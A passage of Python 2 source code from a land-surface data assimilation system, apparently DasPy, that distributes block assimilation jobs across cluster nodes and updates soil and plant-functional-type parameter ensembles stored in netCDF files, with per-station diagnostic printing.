"Parameter_Soil_Space_parm_infl:",numpy.mean(NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_parm_infl'][Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0)
Prop_Grid_Array_Sys_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, :, :, :]
Prop_Grid_Array_H_Trans = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_H_Trans'][:, :, :, :]
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:,:,:,:]
for Ens_Index in range(Ensemble_Number):
SysModel_Mat_Ens = Prop_Grid_Array_Sys_Copy[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
ObsModel_Mat_Ens = Prop_Grid_Array_H_Trans[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
print "Ens_Index",Ens_Index,"Parameter_Soil_Space_Ensemble_Copy:",Parameter_Soil_Space_Ensemble_Copy[Ens_Index, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"Parameter_Soil_Space_Ensemble:",Parameter_Soil_Space_Ensemble[Ens_Index, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"SysModel:",SysModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"ObsModel:",ObsModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Analysis:",Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del SysModel_Mat_Ens,ObsModel_Mat_Ens
del Prop_Grid_Array_Sys_Copy,Prop_Grid_Array_H_Trans,Analysis_Grid_Array
Par_Index_Sub += 1
del Parameter_Soil_Space_Ensemble,Parameter_Soil_Space_Ensemble_Copy
for Dim_Soil_Par_Index in range(Dim_Soil_Par):
#print numpy.shape(Parameter_Soil_Space_Ensemble_Obs_Dim[:,Dim_Soil_Par_Index,:,:]),numpy.shape(Parameter_Soil_Space_Ensemble_Temp_Copy[:,Dim_Soil_Par_Index,:,:])
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Obs_Dim'][:,Dim_Soil_Par_Index,:,:] += NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:,Dim_Soil_Par_Index,:,:]
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Initial_Copy.close()
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Parameter.close()
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.close()
NC_File_Out_Assimilation_2_Parameter_Copy.close()
Soil_Par_Sens_Dim = 0
Veg_Par_Sens_Dim = 0
PFT_Par_Sens_Dim = numpy.size(numpy.where(PFT_Par_Sens == True))
Hard_Par_Sens_Dim = 0
if PFT_Par_Sens_Dim >= 1:
PFT_Par_Accum_Dim = PFT_Par_Accum_Dim + 1
Optimized_Parameter_Index[2] = Optimized_Parameter_Index[2] + 1
print "**********************************************************************Optimize PFT Parameter"
if Parameter_Optimization == 2:
print "############################## Parameter Estimation using Augmentation"
Parameter_Optimization_Flag = 1
if Def_PP and (not PDAF_Assim_Framework == 2) and (Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) > 1 and len(active_nodes_server) > 1:
print "********************************************** Using PP to Accelerate Block_Assim"
Job_Num_Per_Node = int(numpy.ceil(float(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) / len(active_nodes_server)))
print "The following submits",Job_Num_Per_Node,"jobs on each node and then retrieves the results"
if Job_Num_Per_Node == 0:
Job_Num_Per_Node = 1
job_server_node_results = []
job_server_node_results_wise = [[] for i in range(len(active_nodes_server))]
# The following submits 1 job to 1 node and then retrieves the results
print "+++++++++++++++++ The following submits",Job_Num_Per_Node,"jobs to 1 node and then retrieves the results"
Block_Index = 0
Node_Status = numpy.zeros(len(active_nodes_server),dtype=numpy.bool)
Node_Status[:] = True
while Block_Index < Sub_Block_Ratio_Row*Sub_Block_Ratio_Col:
if numpy.size(numpy.where(Node_Status==True)) > 0:
Node_Index = numpy.where(Node_Status==True)[0][0]
print "***********************Node_Index",Node_Index,"Block_Index",Block_Index,"is submitted!"
job_server_node = job_server_node_array[numpy.min([Node_Index*len(job_server_node_array)/len(active_nodes_server),len(job_server_node_array)-1])]
job_server_node_results.append(job_server_node.submit(Block_Assim, args=(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_Par, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Par, Bias_Estimation_Option_Obs_Par, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path),
depfuncs=(CLM_Assim_Common, Check_Outliers, ParFor_PFT, ParFor_PFT_Block_Assim, ParFor_Fusion, ParFor_H_Operator, ParFor_Texture_Check, ParFor_Check_Outliers, ParFor_Check_Outliers_NA),
modules=("numpy", "netCDF4", "sys", "os", "re", "gc", "imp", "unittest", "time", "datetime", "shutil", "fnmatch", "subprocess", "string", "socket", "getpass", "calendar", "glob","scipy.stats",'scipy.weave'), group='Block_Assim'))
job_server_node_results_wise[Node_Index] = job_server_node_results[Block_Index]
Node_Status[Node_Index] = False
Block_Index = Block_Index + 1
if Block_Index >= len(active_nodes_server):
for job in job_server_node_results_wise:
if job != [] and job.finished:
Node_Index = job_server_node_results_wise.index(job)
print "*********************************************************************Node_Index",Node_Index,"is finished!"
Node_Status[Node_Index] = True
job_server_node_results_wise[Node_Index] = []
for job_server_node in job_server_node_array:
job_server_node.wait()
if Def_Print >= 2:
job_server_node.print_stats()
if Def_Print:
if len(job_server_node_results) > 0:
for job in job_server_node_results:
job_index = job_server_node_results.index(job)
if job_index > (Ensemble_Number - 1):
break
print "Results of ",job_index,"is", job()
else:
print "********* Run Block_Assim Sequentially"
if PDAF_Assim_Framework == 2:
DAS_Driver_Common.Stop_ppserver(mpi4py_rank, Def_PP, DAS_Depends_Path, job_server_node_array, NSLOTS, DasPy_Path, active_nodes_server, PP_Servers_Per_Node)
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
Block_Assim(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_Par, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Par, Bias_Estimation_Option_Obs_Par, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path, octave, r)
print "Write NC_File_Out_Assimilation_2_Initial.nc"
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r+')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r+')
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r+')
Parameter_PFT_Space_Ensemble = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:,:,:,:]
Parameter_PFT_Space_parm_infl = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_parm_infl'][:,:,:]
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, :, :, :]
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
print "Block_Index",Block_Index
Sub_Block_Row_Start = Sub_Block_Row_Start_Array[Block_Index]
Sub_Block_Row_End = Sub_Block_Row_End_Array[Block_Index]
Sub_Block_Col_Start = Sub_Block_Col_Start_Array[Block_Index]
Sub_Block_Col_End = Sub_Block_Col_End_Array[Block_Index]
NC_FileName_Out_Block = DAS_Output_Path+"Analysis/"+Region_Name+"/Block_Assim_"+str(Block_Index+1)+".nc"
NC_File_Out_Block = netCDF4.Dataset(NC_FileName_Out_Block, 'r')
Analysis_Grid[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid'][:,:]
Localization_Map_Mask[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Localization_Map_Mask'][:,:]
Parameter_PFT_Space_Ensemble[:,:,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Parameter_PFT_Space_Ensemble'][:,:,:,:]
Parameter_PFT_Space_parm_infl[:,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Parameter_PFT_Space_parm_infl'][:,:,:]
Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid_Array'][:,Prop_Grid_Array_Sys_Index,:,:]
NC_File_Out_Block.close()
NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:,:,:,:] = Parameter_PFT_Space_Ensemble
NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_parm_infl'][:,:,:] = Parameter_PFT_Space_parm_infl
NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, Prop_Grid_Array_Sys_Index, :, :] = Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, :, :]
del Parameter_PFT_Space_Ensemble,Parameter_PFT_Space_parm_infl,Analysis_Grid_Array
NC_File_Out_Assimilation_2_Initial.sync()
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Diagnostic.sync()
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Parameter.sync()
NC_File_Out_Assimilation_2_Parameter.close()
#------------------------------------------Finish Assimilation
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
Observation_Matrix_Copy = numpy.copy(Observation_Matrix[Observation_Matrix_Index,::])
Observation_Matrix_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, Observation_Matrix_Copy)
Analysis_Grid_Temp = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], Analysis_Grid[Prop_Grid_Array_Sys_Index,::])
Analysis_Grid_Temp = numpy.ma.masked_where(Analysis_Grid_Temp == NAvalue, Analysis_Grid_Temp)
Model_State = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], numpy.mean(NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, :, :],axis=0))
ObsModel_Mat_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, ObsModel_Mat)
NC_File_Out_Assimilation_2_Initial_Copy.close()
if Def_Print:
print "numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)",numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)
print "Min Observation Value is:", Observation_Matrix_Copy.min(), "Maximum Observation Value is:", Observation_Matrix_Copy.max()
print "Min Model_State Value is:", Model_State.min(), "Maximum Model_State Value is:", Model_State.max()
print "Min Analysis_Grid Value is:", Analysis_Grid_Temp.min(), "Maximum Analysis_Grid Value is:", Analysis_Grid_Temp.max()
print "Analysis Mean is:", numpy.mean(Analysis_Grid_Temp), "Model Ensemble Mean is:", numpy.mean(Model_State), "(Analysis - Model_State) Mean is:", numpy.mean(Analysis_Grid_Temp.flatten() - Model_State.flatten())
print "ObsModel_Mat Mean is:", numpy.mean(ObsModel_Mat_Copy),"Observation Mean is:", numpy.mean(Observation_Matrix_Copy), "(ObsModel_Mat - Observation) Mean is:", numpy.mean(ObsModel_Mat.flatten() - Observation_Matrix_Copy.flatten())
if Def_Print:
print "******************************************************** Station Statistics"
for Station_Index in range(numpy.size(Station_XY)/2):
print "Station_"+str(Station_Index+1),"Analysis:",Analysis_Grid_Temp[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Model Value:",Model_State[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Observation_Value:",Observation_Matrix_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
print "ObsModel_Variance:",ObsModel_Variance_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"ObsModel:",ObsModel_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del Observation_Matrix_Copy,Analysis_Grid_Temp,Model_State,ObsModel_Mat_Copy
else:
print "############################## Wrong Parameter_Optimization Value, Should be 1 or 2"
os.abort()
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r+')
NC_File_Out_Assimilation_2_Parameter_Obs_Dim = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Obs_Dim, 'r+')
NC_File_Out_Assimilation_2_Parameter_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Copy, 'r')
if Def_Print:
print "******************************************************** Station Statistics"
for Station_Index in range(numpy.size(Station_XY)/2):
print "-------------------------------------------Results of Station_"+str(Station_Index+1)
Par_Index_Sub = 0
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
print "PFT_Par_Sens[Par_Index]",Par_Index
print "Parameter_PFT_Space_Ensemble_Copy:",numpy.mean(NC_File_Out_Assimilation_2_Parameter_Copy.variables['Parameter_PFT_Space_Ensemble'][:, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0), \
"Parameter_PFT_Space_Ensemble:",numpy.mean(NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0)
if msw_infl < 0.0:
print "Parameter_PFT_Space_parm_infl_Copy:",numpy.mean(NC_File_Out_Assimilation_2_Parameter_Copy.variables['Parameter_PFT_Space_parm_infl'][Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0), \
"Parameter_PFT_Space_parm_infl:",numpy.mean(NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_parm_infl'][Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0)
Prop_Grid_Array_Sys_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, :, :, :]
Prop_Grid_Array_H_Trans = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_H_Trans'][:, :, :, :]
Parameter_PFT_Space_Ensemble_Copy = NC_File_Out_Assimilation_2_Parameter_Copy.variables['Parameter_PFT_Space_Ensemble'][:, :, :, :]
Parameter_PFT_Space_Ensemble = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:, :, :,:]
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:,:,:,:]
for Ens_Index in range(Ensemble_Number):
SysModel_Mat_Ens = Prop_Grid_Array_Sys_Copy[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
ObsModel_Mat_Ens = Prop_Grid_Array_H_Trans[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
print "Ens_Index",Ens_Index,"Parameter_PFT_Space_Ensemble_Copy:",Parameter_PFT_Space_Ensemble_Copy[Ens_Index, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"Parameter_PFT_Space_Ensemble:",Parameter_PFT_Space_Ensemble[Ens_Index, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"SysModel:",SysModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"ObsModel:",ObsModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Analysis:",Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del SysModel_Mat_Ens,ObsModel_Mat_Ens
del Prop_Grid_Array_Sys_Copy,Prop_Grid_Array_H_Trans,Parameter_PFT_Space_Ensemble_Copy,Parameter_PFT_Space_Ensemble,Analysis_Grid_Array
Par_Index_Sub += 1
#os.abort()
for Dim_PFT_Par_Index in range(Dim_PFT_Par):
#print numpy.shape(Parameter_PFT_Space_Ensemble_Obs_Dim[:,Dim_PFT_Par_Index,:,:]),numpy.shape(Parameter_PFT_Space_Ensemble_Temp_Copy[:,Dim_PFT_Par_Index,:,:])
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Obs_Dim'][:,Dim_PFT_Par_Index,:,:] += NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:,Dim_PFT_Par_Index,:,:]
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Initial_Copy.close()
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Parameter.close()
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.close()
NC_File_Out_Assimilation_2_Parameter_Copy.close()
print "Soil_Par_Accum_Dim",Soil_Par_Accum_Dim,"Veg_Par_Accum_Dim",Veg_Par_Accum_Dim,"PFT_Par_Accum_Dim",PFT_Par_Accum_Dim
print ""
print "Optimized_Parameter_Index",Optimized_Parameter_Index
numexpr_a = []
numexpr_b = []
numexpr_c = []
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Parameter_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Copy, 'r')
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r+')
NC_File_Out_Assimilation_2_Parameter_Obs_Dim = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Obs_Dim, 'r+')
if Soil_Par_Accum_Dim > 0:
Parameter_Soil_Space_Ensemble_Obs_Dim = NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Obs_Dim'][:,:,:,:]
for Dim_Soil_Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens_Array[0][Dim_Soil_Par_Index] or Soil_Par_Sens_Array[1][Dim_Soil_Par_Index]:
#print numpy.shape(Parameter_Soil_Space_Ensemble_Obs_Dim[:,Dim_Soil_Par_Index,:,:]),numpy.shape(Parameter_Soil_Space_Ensemble_Temp_Copy[:,Dim_Soil_Par_Index,:,:])
Parameter_Soil_Space_Ensemble_Obs_Dim[:,Dim_Soil_Par_Index,:,:] = Parameter_Soil_Space_Ensemble_Obs_Dim[:,Dim_Soil_Par_Index,:,:] / float(Soil_Par_Accum_Dim)
if Parameter_Optimization == 1:
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Predict_Obs_Dim'][:,Dim_Soil_Par_Index,:,:] = NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Predict_Obs_Dim'][:,Dim_Soil_Par_Index,:,:] / float(Soil_Par_Accum_Dim)
else:
for Ens_Index in range(Ensemble_Number):
Parameter_Soil_Space_Ensemble_Obs_Dim[Ens_Index,Dim_Soil_Par_Index,:,:] = NC_File_Parameter_Space_Single.variables['Parameter_Soil_Space_Single'][Dim_Soil_Par_Index,:,:]
if Parameter_Optimization == 1:
for Ens_Index in range(Ensemble_Number_Predict):
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Predict_Obs_Dim'][Ens_Index,Dim_Soil_Par_Index,:,:] = NC_File_Parameter_Space_Single.variables['Parameter_Soil_Space_Single'][Dim_Soil_Par_Index,:,:]
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Obs_Dim'][:,:,:,:] = Parameter_Soil_Space_Ensemble_Obs_Dim
del Parameter_Soil_Space_Ensemble_Obs_Dim
if PFT_Par_Accum_Dim > 0:
Parameter_PFT_Space_Ensemble_Obs_Dim = NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Obs_Dim'][:,:,:,:]
for Dim_PFT_Par_Index in range(Dim_PFT_Par):
if numpy.size(numpy.where(numpy.asarray(PFT_Par_Sens_Array)[:,Dim_PFT_Par_Index] == True)) >= 1:
Parameter_PFT_Space_Ensemble_Obs_Dim[:,Dim_PFT_Par_Index,:,:] = Parameter_PFT_Space_Ensemble_Obs_Dim[:,Dim_PFT_Par_Index,:,:] / float(PFT_Par_Accum_Dim)
if Parameter_Optimization == 1:
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Predict_Obs_Dim'][Ens_Index,Dim_PFT_Par_Index,:,:] = NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Predict_Obs_Dim'][Ens_Index,Dim_PFT_Par_Index,:,:] / float(PFT_Par_Accum_Dim)
else:
for Ens_Index in range(Ensemble_Number):
Parameter_PFT_Space_Ensemble_Obs_Dim[Ens_Index,Dim_PFT_Par_Index,:,:] = NC_File_Parameter_Space_Single.variables['Parameter_PFT_Space_Single'][Dim_PFT_Par_Index,:,:]
if Parameter_Optimization == 1:
for Ens_Index in range(Ensemble_Number_Predict):
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Predict_Obs_Dim'][Ens_Index,Dim_PFT_Par_Index,:,:] = NC_File_Parameter_Space_Single.variables['Parameter_PFT_Space_Single'][Dim_PFT_Par_Index,:,:]
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Obs_Dim'][:,:,:,:] = Parameter_PFT_Space_Ensemble_Obs_Dim
del Parameter_PFT_Space_Ensemble_Obs_Dim
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Obs_Dim'][:,:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Veg_Space_Ensemble_Obs_Dim'][:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Hard_Space_Ensemble_Obs_Dim'][:,:,:,:] = 0.0
if (numpy.size(numpy.where(numpy.asarray(Veg_Par_Sens_Array) == True)) >= 1):
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Veg_Space_Ensemble_Matrix_Obs_Dim'][:,:,:,:] = 0.0
if (numpy.size(numpy.where(numpy.asarray(PFT_Par_Sens_Array) == True)) >= 1):
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Obs_Dim'][:,:,:,:] = 0.0
if Parameter_Optimization == 1:
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Predict_Obs_Dim'][:,:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Veg_Space_Ensemble_Predict_Obs_Dim'][:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Predict_Obs_Dim'][:,:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Hard_Space_Ensemble_Predict_Obs_Dim'][:,:,:,:] = 0.0
